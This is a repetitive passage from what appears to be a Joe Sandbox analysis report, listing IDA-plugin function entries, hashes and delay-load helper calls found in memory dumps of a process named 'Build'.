                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 45080d3f2665abe596236831be8e0ae9594466c65c79c1b8b6efd66aae6aeab4
                                                                                                                                                                                • Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
                                                                                                                                                                                • Opcode Fuzzy Hash: 45080d3f2665abe596236831be8e0ae9594466c65c79c1b8b6efd66aae6aeab4
                                                                                                                                                                                • Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: bcd7ad32ef623381bf7c5638f7681946f160cc505c88fff14edb3b5f9a66084f
                                                                                                                                                                                • Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
                                                                                                                                                                                • Opcode Fuzzy Hash: bcd7ad32ef623381bf7c5638f7681946f160cc505c88fff14edb3b5f9a66084f
                                                                                                                                                                                • Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 8da1ed659297f104f104c56e069e74f7c9fcdfc380f260b0bca26a96744fdd25
                                                                                                                                                                                • Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
                                                                                                                                                                                • Opcode Fuzzy Hash: 8da1ed659297f104f104c56e069e74f7c9fcdfc380f260b0bca26a96744fdd25
                                                                                                                                                                                • Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 3900a65ccf8b2523613089cd047391560819079c5120617ba0ca224842ae6828
                                                                                                                                                                                • Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
                                                                                                                                                                                • Opcode Fuzzy Hash: 3900a65ccf8b2523613089cd047391560819079c5120617ba0ca224842ae6828
                                                                                                                                                                                • Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: ee17ebb4048be68cda72f4037aa3cff98f0e4096b324db3736e73538435724d9
                                                                                                                                                                                • Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
                                                                                                                                                                                • Opcode Fuzzy Hash: ee17ebb4048be68cda72f4037aa3cff98f0e4096b324db3736e73538435724d9
                                                                                                                                                                                • Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: ef71149ccfbd15f880f3321184e5467e2c5ddf6681b31a978273e23f1844040a
                                                                                                                                                                                • Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
                                                                                                                                                                                • Opcode Fuzzy Hash: ef71149ccfbd15f880f3321184e5467e2c5ddf6681b31a978273e23f1844040a
                                                                                                                                                                                • Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 54776b7fa6e3630aabcb5349dfeec10cbbbf9f362a8aa885b94f2efffc359dd8
                                                                                                                                                                                • Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
                                                                                                                                                                                • Opcode Fuzzy Hash: 54776b7fa6e3630aabcb5349dfeec10cbbbf9f362a8aa885b94f2efffc359dd8
                                                                                                                                                                                • Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B608A7
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: b75d841392964c5f6b9c862e786fd34ffc9007901b53d0cea690d1f1fbd3b852
                                                                                                                                                                                • Instruction ID: ce7b76fcb3ee7b4adcf386208599b70198b8a75bb59050459f05b47b5bbc1b46
                                                                                                                                                                                • Opcode Fuzzy Hash: b75d841392964c5f6b9c862e786fd34ffc9007901b53d0cea690d1f1fbd3b852
                                                                                                                                                                                • Instruction Fuzzy Hash: E6A001962B9113BC350DB29AAD46C3B22ACD5D5BA5330CAEEF91AC5092A88828855075
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B608A7
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 49ce0af5d90efd1f078c2ef5767002f2c487e7347e512882c5fcd0fe592f4b8b
                                                                                                                                                                                • Instruction ID: ce7b76fcb3ee7b4adcf386208599b70198b8a75bb59050459f05b47b5bbc1b46
                                                                                                                                                                                • Opcode Fuzzy Hash: 49ce0af5d90efd1f078c2ef5767002f2c487e7347e512882c5fcd0fe592f4b8b
                                                                                                                                                                                • Instruction Fuzzy Hash: E6A001962B9113BC350DB29AAD46C3B22ACD5D5BA5330CAEEF91AC5092A88828855075
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B608A7
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 46c11023b63e0da472ff3baf8bdff227afe6614a6e77d4dfbc7589619c672632
                                                                                                                                                                                • Instruction ID: 72216731671456accfc43ffe9a7df53ee2bb8789b3cd8df723e5abe0a16436e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 46c11023b63e0da472ff3baf8bdff227afe6614a6e77d4dfbc7589619c672632
                                                                                                                                                                                • Instruction Fuzzy Hash: D1A001962B9212BC350DB2AAAD46C3B22ACD5D1B65330CAFEF91DD5096A88828855075
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B608A7
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 8050fc8d32e9b207fc839731bf5fa7d7f441c27edeb9282aa96525c592e362f8
                                                                                                                                                                                • Instruction ID: ce7b76fcb3ee7b4adcf386208599b70198b8a75bb59050459f05b47b5bbc1b46
                                                                                                                                                                                • Opcode Fuzzy Hash: 8050fc8d32e9b207fc839731bf5fa7d7f441c27edeb9282aa96525c592e362f8
                                                                                                                                                                                • Instruction Fuzzy Hash: E6A001962B9113BC350DB29AAD46C3B22ACD5D5BA5330CAEEF91AC5092A88828855075
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B608A7
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 5ce6a2427cdb8d8d8cc6fd7f1f6deaccd22d3e14497a3656c927512f9a7dc2f7
                                                                                                                                                                                • Instruction ID: ce7b76fcb3ee7b4adcf386208599b70198b8a75bb59050459f05b47b5bbc1b46
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ce6a2427cdb8d8d8cc6fd7f1f6deaccd22d3e14497a3656c927512f9a7dc2f7
                                                                                                                                                                                • Instruction Fuzzy Hash: E6A001962B9113BC350DB29AAD46C3B22ACD5D5BA5330CAEEF91AC5092A88828855075
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B608A7
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 5a55124a73523c2e2d6342d76fea27e97cbab98d87e4bf96d9983f66384fc710
                                                                                                                                                                                • Instruction ID: ce7b76fcb3ee7b4adcf386208599b70198b8a75bb59050459f05b47b5bbc1b46
                                                                                                                                                                                • Opcode Fuzzy Hash: 5a55124a73523c2e2d6342d76fea27e97cbab98d87e4bf96d9983f66384fc710
                                                                                                                                                                                • Instruction Fuzzy Hash: E6A001962B9113BC350DB29AAD46C3B22ACD5D5BA5330CAEEF91AC5092A88828855075
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B609FC
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
